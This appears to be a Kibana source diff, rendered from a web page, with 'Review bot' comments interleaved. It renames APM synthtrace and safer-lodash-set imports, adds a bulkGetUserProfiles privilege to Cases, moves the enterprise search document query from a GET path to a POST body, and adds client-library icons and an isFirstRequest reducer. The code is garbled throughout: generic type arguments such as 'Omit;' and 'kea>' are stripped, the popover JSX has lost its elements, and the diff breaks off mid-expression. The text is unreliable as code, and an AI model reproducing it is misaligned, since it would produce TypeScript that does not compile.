b/x-pack/plugins/apm/ftr_e2e/cypress/integration/power_user/settings/agent_configurations.spec.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; import url from 'url'; import { synthtrace } from '../../../../synthtrace'; 
diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts index 66a70428b2275..56978f03123a8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/errors/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, to }: { from: number; to: number }) { const range = timerange(from, to); diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts index 4fc94d2305b57..e3cdf7e8bbce8 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateMultipleServicesData({ from, diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts index 94b7ab52f6f70..243f1df257a4f 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_inventory/header_filters/generate_data.ts 
@@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; export function generateData({ from, diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts index 68dc3f62b5c12..bbd7553d1fa33 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/service_overview/aws_lambda/generate_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, timerange } from '@elastic/apm-synthtrace'; +import { apm, timerange } from '@kbn/apm-synthtrace'; const dataConfig = { serviceName: 'synth-python', diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts index 3905cf324c44a..0ced34d8a1b7c 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/integration/read_only_user/transaction_details/generate_span_links_data.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import { apm, EntityArrayIterable, timerange } from '@elastic/apm-synthtrace'; +import { apm, EntityArrayIterable, timerange } from '@kbn/apm-synthtrace'; import { synthtrace } from '../../../../synthtrace'; import { SpanLink } from '../../../../../typings/es_schemas/raw/fields/span_links'; 
diff --git a/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts b/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts index 25b29e080b2c2..54622cb59bd5e 100644 --- a/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts +++ b/x-pack/plugins/apm/ftr_e2e/cypress/plugins/index.ts @@ -9,7 +9,7 @@ import { createLogger, EntityArrayIterable, LogLevel, -} from '@elastic/apm-synthtrace'; +} from '@kbn/apm-synthtrace'; import { createEsClientForTesting } from '@kbn/test'; // *********************************************************** diff --git a/x-pack/plugins/apm/ftr_e2e/synthtrace.ts b/x-pack/plugins/apm/ftr_e2e/synthtrace.ts index de113c6c44c4d..6fb880c40b0cc 100644 --- a/x-pack/plugins/apm/ftr_e2e/synthtrace.ts +++ b/x-pack/plugins/apm/ftr_e2e/synthtrace.ts @@ -4,7 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import type { EntityIterable } from '@elastic/apm-synthtrace'; +import type { EntityIterable } from '@kbn/apm-synthtrace'; export const synthtrace = { index: (events: EntityIterable) => diff --git a/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx b/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx index 55b486f5ae366..ff8442016adc5 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/apm_main_template.tsx 
@@ -9,7 +9,7 @@ import { EuiPageHeaderProps } from '@elastic/eui'; import React from 'react'; import { useLocation } from 'react-router-dom'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { enableServiceGroups } from '@kbn/observability-plugin/public'; import { EnvironmentsContextProvider } from '../../../context/environments_context/environments_context'; import { useFetcher, FETCH_STATUS } from '../../../hooks/use_fetcher'; diff --git a/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx b/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx index 7acf14fc0bf01..c6c4c405d11af 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/apm_service_template/index.tsx @@ -14,7 +14,6 @@ import { import { i18n } from '@kbn/i18n'; import { omit } from 'lodash'; import React from 'react'; -import { enableInfrastructureView } from '@kbn/observability-plugin/public'; import { isMobileAgentName, isJavaAgentName, @@ -177,8 +176,6 @@ function useTabs({ selectedTab }: { selectedTab: Tab['key'] }) { capabilities ); - const showInfraTab = core.uiSettings.get(enableInfrastructureView); - const router = useApmRouter(); const { @@ -269,8 +266,6 @@ function useTabs({ selectedTab }: { selectedTab: Tab['key'] }) { label: i18n.translate('xpack.apm.home.infraTabLabel', { defaultMessage: 'Infrastructure', }), - - hidden: !showInfraTab, }, { key: 'service-map', diff --git a/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts b/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts index 4e4c90b4cfeac..9a36431b1f825 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts 
+++ b/x-pack/plugins/apm/public/components/routing/templates/no_data_config.ts @@ -6,7 +6,7 @@ */ import { i18n } from '@kbn/i18n'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; export function getNoDataConfig({ docsLink, @@ -22,7 +22,7 @@ export function getNoDataConfig({ basePath?: string; hasApmData?: boolean; hasApmIntegrations?: boolean; -}): KibanaPageTemplateProps['noDataConfig'] { +}): NoDataConfig | undefined { // don't show "no data screen" when there is APM data or it should be bypassed if (hasApmData || shouldBypassNoDataScreen || loading) { return; diff --git a/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx b/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx index a891ab9bdcdce..1eece05eb8843 100644 --- a/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx +++ b/x-pack/plugins/apm/public/components/routing/templates/service_group_template.tsx @@ -16,7 +16,7 @@ import { import React from 'react'; import { i18n } from '@kbn/i18n'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { KibanaPageTemplateProps } from '@kbn/shared-ux-page-kibana-template'; import { enableServiceGroups } from '@kbn/observability-plugin/public'; import { useFetcher, FETCH_STATUS } from '../../../hooks/use_fetcher'; import { ApmPluginStartDeps } from '../../../plugin'; diff --git a/x-pack/plugins/apm/readme.md b/x-pack/plugins/apm/readme.md index df7b641fbb231..fb7cf20732bf3 100644 --- a/x-pack/plugins/apm/readme.md +++ b/x-pack/plugins/apm/readme.md 
@@ -13,7 +13,7 @@ ## Tooling - [VSCode setup instructions](./dev_docs/vscode_setup.md) - [Github PR commands](./dev_docs/github_commands.md) -- [Synthtrace (data generation)](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/README.md) +- [Synthtrace (data generation)](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/README.md) - [Query debugging in development and production](./dev_docs/query_debugging_in_development_and_production.md) ## Other resources diff --git a/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts b/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts index f9aa943b5eceb..a48da0f4577cc 100644 --- a/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts +++ b/x-pack/plugins/apm/scripts/aggregate_latency_metrics/index.ts @@ -8,7 +8,7 @@ import { argv } from 'yargs'; import pLimit from 'p-limit'; import pRetry from 'p-retry'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { uniq, without, merge, flatten } from 'lodash'; import * as histogram from 'hdr-histogram-js'; import { diff --git a/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx b/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx index 9150b78f6000a..256d33a8e7a78 100644 --- a/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx +++ b/x-pack/plugins/canvas/public/components/asset_manager/asset.tsx @@ -7,7 +7,7 @@ import { Dispatch } from 'redux'; import { connect } from 'react-redux'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { fromExpression, toExpression } from '@kbn/interpreter'; diff --git a/x-pack/plugins/canvas/public/expression_types/arg_types/font.js b/x-pack/plugins/canvas/public/expression_types/arg_types/font.js index 1ec6ba77685ef..d1e71fb59bf4d 100644 --- a/x-pack/plugins/canvas/public/expression_types/arg_types/font.js 
+++ b/x-pack/plugins/canvas/public/expression_types/arg_types/font.js @@ -8,7 +8,7 @@ import React from 'react'; import PropTypes from 'prop-types'; import { get, mapValues } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { openSans } from '../../../common/lib/fonts'; import { templateFromReactComponent } from '../../lib/template_from_react_component'; import { TextStylePicker } from '../../components/text_style_picker'; diff --git a/x-pack/plugins/canvas/public/functions/plot/index.ts b/x-pack/plugins/canvas/public/functions/plot/index.ts index 5880d833c5be1..cc2a893777c2e 100644 --- a/x-pack/plugins/canvas/public/functions/plot/index.ts +++ b/x-pack/plugins/canvas/public/functions/plot/index.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { groupBy, get, keyBy, map, sortBy } from 'lodash'; import { ExpressionFunctionDefinition, Style } from '@kbn/expressions-plugin/common'; import type { PaletteRegistry, PaletteOutput } from '@kbn/coloring'; diff --git a/x-pack/plugins/canvas/shareable_runtime/api/index.ts b/x-pack/plugins/canvas/shareable_runtime/api/index.ts index ad9e4fcf03cdc..52e0f81f87e91 100644 --- a/x-pack/plugins/canvas/shareable_runtime/api/index.ts +++ b/x-pack/plugins/canvas/shareable_runtime/api/index.ts @@ -6,7 +6,7 @@ */ import 'core-js/stable'; -import 'regenerator-runtime/runtime'; +import '@babel/runtime/regenerator'; import 'whatwg-fetch'; import 'jquery'; import '@kbn/flot-charts'; diff --git a/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx b/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx index 22dd3fcbd711e..e3864086a85dd 100644 --- a/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx +++ b/x-pack/plugins/canvas/storybook/decorators/redux_decorator.tsx 
@@ -9,7 +9,7 @@ import React from 'react'; import { createStore } from 'redux'; import { Provider as ReduxProvider } from 'react-redux'; import { cloneDeep } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { CanvasWorkpad, CanvasElement, CanvasAsset, CanvasPage } from '../../types'; diff --git a/x-pack/plugins/cases/public/client/attachment_framework/types.ts b/x-pack/plugins/cases/public/client/attachment_framework/types.ts index 1f974d09c887f..2f8d7eacb0553 100644 --- a/x-pack/plugins/cases/public/client/attachment_framework/types.ts +++ b/x-pack/plugins/cases/public/client/attachment_framework/types.ts @@ -12,10 +12,8 @@ import { CommentRequestPersistableStateType, } from '../../../common/api'; import { Case } from '../../containers/types'; -import { SupportedUserActionTypes } from '../../components/user_actions/types'; export interface AttachmentViewObject { - type?: SupportedUserActionTypes; timelineAvatar?: EuiCommentProps['timelineAvatar']; actions?: EuiCommentProps['actions']; event?: EuiCommentProps['event']; diff --git a/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx b/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx index cd91d75b4062d..9b003c373873b 100644 --- a/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx +++ b/x-pack/plugins/cases/public/components/user_actions/comment/registered_attachments.tsx @@ -90,7 +90,6 @@ export const createRegisteredAttachmentUserActionBuilder = < fullName={comment.createdBy.fullName} /> ), - type: attachmentViewObject.type, className: `comment-${comment.type}-attachment-${attachmentTypeId}`, event: attachmentViewObject.event, 'data-test-subj': `comment-${comment.type}-${attachmentTypeId}`, diff --git a/x-pack/plugins/cases/server/features.ts b/x-pack/plugins/cases/server/features.ts index f4e502912a2a6..d2ddc6a1030a0 100644 
--- a/x-pack/plugins/cases/server/features.ts +++ b/x-pack/plugins/cases/server/features.ts @@ -38,7 +38,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { cases: [APP_ID], privileges: { all: { - api: ['casesSuggestUserProfiles'], + api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'], cases: { create: [APP_ID], read: [APP_ID], @@ -55,6 +55,7 @@ export const getCasesKibanaFeature = (): KibanaFeatureConfig => { ui: capabilities.all, }, read: { + api: ['bulkGetUserProfiles'], cases: { read: [APP_ID], }, diff --git a/x-pack/plugins/cases/server/services/so_reference_extractor.ts b/x-pack/plugins/cases/server/services/so_reference_extractor.ts index 622cce373e755..27fdf17b5f727 100644 --- a/x-pack/plugins/cases/server/services/so_reference_extractor.ts +++ b/x-pack/plugins/cases/server/services/so_reference_extractor.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { SavedObject, SavedObjectReference, SavedObjectsUpdateResponse } from '@kbn/core/server'; diff --git a/x-pack/plugins/enterprise_search/common/types/analytics.ts b/x-pack/plugins/enterprise_search/common/types/analytics.ts new file mode 100644 index 0000000000000..e75617645a139 --- /dev/null +++ b/x-pack/plugins/enterprise_search/common/types/analytics.ts @@ -0,0 +1,14 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export interface AnalyticsCollection { + id: string; + name: string; + event_retention_day_length: number; +} + +export type AnalyticsCollectionDocument = Omit; diff --git a/x-pack/plugins/enterprise_search/common/types/error_codes.ts b/x-pack/plugins/enterprise_search/common/types/error_codes.ts index 327d000003f9b..46a787ae257ec 100644 
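Review bot: The `read` privilege now carries `api: ['bulkGetUserProfiles']`, the only API tag on that privilege in this hunk, and nothing in the diff records why read-only case users need it. A one-line comment next to it keeps the privilege table reviewable, e.g. `// read-only users still need profile lookups to render assignees and comment authors` (adjust to the real reason). Presumably the matching server route is tagged with this access string and only resolves explicitly supplied profile UIDs; that is worth confirming in the route definition rather than here.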
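Review bot: As rendered, `export type AnalyticsCollectionDocument = Omit;` has no type arguments and would not compile; presumably the page stripped the `<…>` part, but it is worth checking the committed file reads as intended. `AnalyticsCollection` also has no documentation; a short TSDoc on `event_retention_day_length` stating its unit (days, going by the name — confirm) would help any caller that persists or validates the document.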
--- a/x-pack/plugins/enterprise_search/common/types/error_codes.ts +++ b/x-pack/plugins/enterprise_search/common/types/error_codes.ts @@ -6,6 +6,7 @@ */ export enum ErrorCode { + ANALYTICS_COLLECTION_ALREADY_EXISTS = 'analytics_collection_already_exists', CONNECTOR_DOCUMENT_ALREADY_EXISTS = 'connector_document_already_exists', CRAWLER_ALREADY_EXISTS = 'crawler_already_exists', INDEX_ALREADY_EXISTS = 'index_already_exists', diff --git a/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts b/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts index e65f0a542ada5..0a4524ef06d71 100644 --- a/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts +++ b/x-pack/plugins/enterprise_search/public/applications/__mocks__/kea_logic/kibana_logic.mock.ts @@ -20,6 +20,10 @@ export const mockKibanaValues = { }, history: mockHistory, navigateToUrl: jest.fn(), + productAccess: { + hasAppSearchAccess: true, + hasWorkplaceSearchAccess: true, + }, security: securityMock.createStart(), setBreadcrumbs: jest.fn(), setChromeIsVisible: jest.fn(), diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts index fb0162c8aec15..e9250c14f171d 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.test.ts 
@@ -19,7 +19,7 @@ describe('SearchDocumentsApiLogic', () => { describe('searchDocuments', () => { it('calls correct api', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ indexName: 'indexName', pagination: { @@ -28,15 +28,18 @@ describe('SearchDocumentsApiLogic', () => { }, }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( + expect(http.post).toHaveBeenCalledWith( '/internal/enterprise_search/indices/indexName/search', - { query: { page: 0, size: 10 } } + { + body: JSON.stringify({}), + query: { page: 0, size: 10 }, + } ); await expect(result).resolves.toEqual('result'); }); it('calls correct api with query set', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ indexName: 'düsseldorf', pagination: { @@ -46,15 +49,20 @@ describe('SearchDocumentsApiLogic', () => { query: 'abcd', }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( - '/internal/enterprise_search/indices/d%C3%BCsseldorf/search/abcd', - { query: { page: 0, size: 10 } } + expect(http.post).toHaveBeenCalledWith( + '/internal/enterprise_search/indices/d%C3%BCsseldorf/search', + { + body: JSON.stringify({ + searchQuery: 'abcd', + }), + query: { page: 0, size: 10 }, + } ); await expect(result).resolves.toEqual('result'); }); it('calls with correct pageSize with docsPerPage set', async () => { const promise = Promise.resolve('result'); - http.get.mockReturnValue(promise); + http.post.mockReturnValue(promise); const result = searchDocuments({ docsPerPage: 25, indexName: 'indexName', 
@@ -64,9 +72,12 @@ describe('SearchDocumentsApiLogic', () => { }, }); await nextTick(); - expect(http.get).toHaveBeenCalledWith( + expect(http.post).toHaveBeenCalledWith( '/internal/enterprise_search/indices/indexName/search', - { query: { page: 0, size: 25 } } + { + body: JSON.stringify({}), + query: { page: 0, size: 25 }, + } ); await expect(result).resolves.toEqual('result'); }); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts index e446522579d07..eb4edd6114d33 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/api/search_documents/search_documents_api_logic.ts @@ -24,15 +24,16 @@ export const searchDocuments = async ({ query?: string; }) => { const newIndexName = encodeURIComponent(indexName); - const route = `/internal/enterprise_search/indices/${newIndexName}/search${ - searchQuery ? `/${searchQuery}` : '' - }`; + const route = `/internal/enterprise_search/indices/${newIndexName}/search`; const query = { page: pagination.pageIndex, size: docsPerPage || pagination.pageSize, }; - return await HttpLogic.values.http.get<{ meta: Meta; results: SearchResponseBody }>(route, { + return await HttpLogic.values.http.post<{ meta: Meta; results: SearchResponseBody }>(route, { + body: JSON.stringify({ + searchQuery, + }), query, }); }; 
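Review bot: The `body:` line deserves a comment explaining why the query moved off the route, since the updated tests now depend on that shape: `// searchQuery is sent in the JSON body rather than interpolated into the path`. `JSON.stringify({ searchQuery })` serialises to `{}` when `searchQuery` is undefined, which the tests pin; the server handler must therefore treat a missing key as "no query", which is outside this diff and worth confirming. `size: docsPerPage || pagination.pageSize` is untouched by the commit but treats `docsPerPage: 0` as unset; `docsPerPage ?? pagination.pageSize` would only fall back on null/undefined.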
diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx index b89f489952ab8..3ec4cab0a6ff6 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/components/client_libraries_popover/popover.tsx @@ -14,10 +14,14 @@ import { EuiContextMenuPanel, EuiContextMenuItem, EuiText, + EuiIcon, + EuiFlexItem, + EuiFlexGroup, } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; +import { icons } from '../../../../../../assets/client_libraries'; import { docLinks } from '../../../../../shared/doc_links'; import { OverviewLogic } from '../../overview.logic'; @@ -25,6 +29,7 @@ import { OverviewLogic } from '../../overview.logic'; const libraries = [ { href: docLinks.clientsJavaIntroduction, + icon: icons.java, key: 'java', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.java', @@ -33,6 +38,7 @@ const libraries = [ }, { href: docLinks.clientsJsIntro, + icon: icons.javascript, key: 'javascript', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.javascript', @@ -41,6 +47,7 @@ const libraries = [ }, { href: docLinks.clientsRubyOverview, + icon: icons.ruby, key: 'ruby', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.ruby', @@ -49,6 +56,7 @@ const libraries = [ }, { href: docLinks.clientsGoIndex, + icon: icons.go, key: 'go', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.go', 
@@ -57,6 +65,7 @@ const libraries = [ }, { href: docLinks.clientsNetIntroduction, + icon: icons.dotnet, key: 'dotnet', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.dotnet', @@ -65,6 +74,7 @@ const libraries = [ }, { href: docLinks.clientsPhpGuide, + icon: icons.php, key: 'php', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.php', @@ -73,6 +83,7 @@ const libraries = [ }, { href: docLinks.clientsPerlGuide, + icon: icons.perl, key: 'perl', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.perl', @@ -81,6 +92,7 @@ const libraries = [ }, { href: docLinks.clientsPythonOverview, + icon: icons.python, key: 'python', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.python', @@ -89,6 +101,7 @@ const libraries = [ }, { href: docLinks.clientsRustOverview, + icon: icons.rust, key: 'rust', text: i18n.translate( 'xpack.enterpriseSearch.content.overview.documentExample.clientLibraries.rust', @@ -116,15 +129,25 @@ export const ClientLibrariesPopover: React.FC = () => { > { - return ( - - -

{item.text}

-
-
- ); - })} + items={libraries.map((item) => ( + : undefined} + > + + + +

{item.text}

+
+
+ + + +
+
+ ))} /> ); diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx index 3be5632fbbefe..6a43cc82d568d 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_index/generate_api_key_panel.tsx @@ -37,7 +37,7 @@ export const GenerateApiKeyPanel: React.FC = () => { const cloudContext = useCloudDetails(); - const DEFAULT_URL = ':'; + const DEFAULT_URL = 'https://localhost:9200'; const searchIndexApiUrl = (cloudContext.cloudId && decodeCloudId(cloudContext.cloudId)?.elasticsearchUrl) || DEFAULT_URL; diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts index 5aecc732e8f00..36157301d3bae 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.test.ts @@ -30,6 +30,7 @@ const DEFAULT_VALUES = { data: undefined, hasNoIndices: false, indices: [], + isFirstRequest: true, isLoading: true, meta: DEFAULT_META, status: Status.IDLE, @@ -92,6 +93,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: elasticsearchViewIndices, + isFirstRequest: false, isLoading: false, meta: newMeta, status: Status.SUCCESS, 
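Review bot: `DEFAULT_URL = 'https://localhost:9200'` is shown as the Elasticsearch endpoint whenever no Cloud ID is present, and nothing marks it as a placeholder; on a self-managed deployment the browser cannot know the real endpoint, so a user may copy a wrong URL next to a freshly generated API key. A comment on that line makes the intent explicit: `// Placeholder shown when no Cloud ID is available; the real self-managed endpoint is not known client-side`. Renaming it to something like `PLACEHOLDER_ES_URL` would carry the same message into the JSX that renders it, which is outside this hunk.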
@@ -122,6 +124,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: true, indices: [], + isFirstRequest: false, isLoading: false, meta, status: Status.SUCCESS, @@ -150,6 +153,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: [], + isFirstRequest: false, isLoading: false, meta, status: Status.SUCCESS, @@ -229,6 +233,7 @@ describe('IndicesLogic', () => { }, hasNoIndices: false, indices: elasticsearchViewIndices, + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -280,6 +285,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -320,6 +326,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.CONNECTED, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -357,6 +364,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, @@ -406,6 +414,7 @@ describe('IndicesLogic', () => { ingestionStatus: IngestionStatus.SYNC_ERROR, }, ], + isFirstRequest: false, isLoading: false, meta: DEFAULT_META, status: Status.SUCCESS, diff --git a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts index afdbafc7fd38c..59640a948ddbc 100644 --- a/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts +++ b/x-pack/plugins/enterprise_search/public/applications/enterprise_search_content/components/search_indices/indices_logic.ts 
@@ -43,11 +43,13 @@ export interface IndicesActions { }): { meta: Meta; returnHiddenIndices: boolean; searchQuery?: string }; makeRequest: typeof FetchIndicesAPILogic.actions.makeRequest; onPaginate(newPageIndex: number): { newPageIndex: number }; + setIsFirstRequest(): boolean; } export interface IndicesValues { data: typeof FetchIndicesAPILogic.values.data; hasNoIndices: boolean; indices: ElasticsearchViewIndex[]; + isFirstRequest: boolean; isLoading: boolean; meta: Meta; status: typeof FetchIndicesAPILogic.values.status; @@ -61,6 +63,7 @@ export const IndicesLogic = kea>({ searchQuery, }), onPaginate: (newPageIndex) => ({ newPageIndex }), + setIsFirstRequest: () => true, }, connect: { actions: [FetchIndicesAPILogic, ['makeRequest', 'apiSuccess', 'apiError']], @@ -76,6 +79,14 @@ export const IndicesLogic = kea>({ }), path: ['enterprise_search', 'content', 'indices_logic'], reducers: () => ({ + isFirstRequest: [ + true, + { + apiError: () => false, + apiSuccess: () => false, + setIsFirstRequest: () => true, + }, + ], meta: [ DEFAULT_META, { @@ -96,8 +107,8 @@ export const IndicesLogic = kea>({ (data) => (data?.indices ? data.indices.map(indexToViewIndex) : []), ], isLoading: [ - () => [selectors.status], - (status) 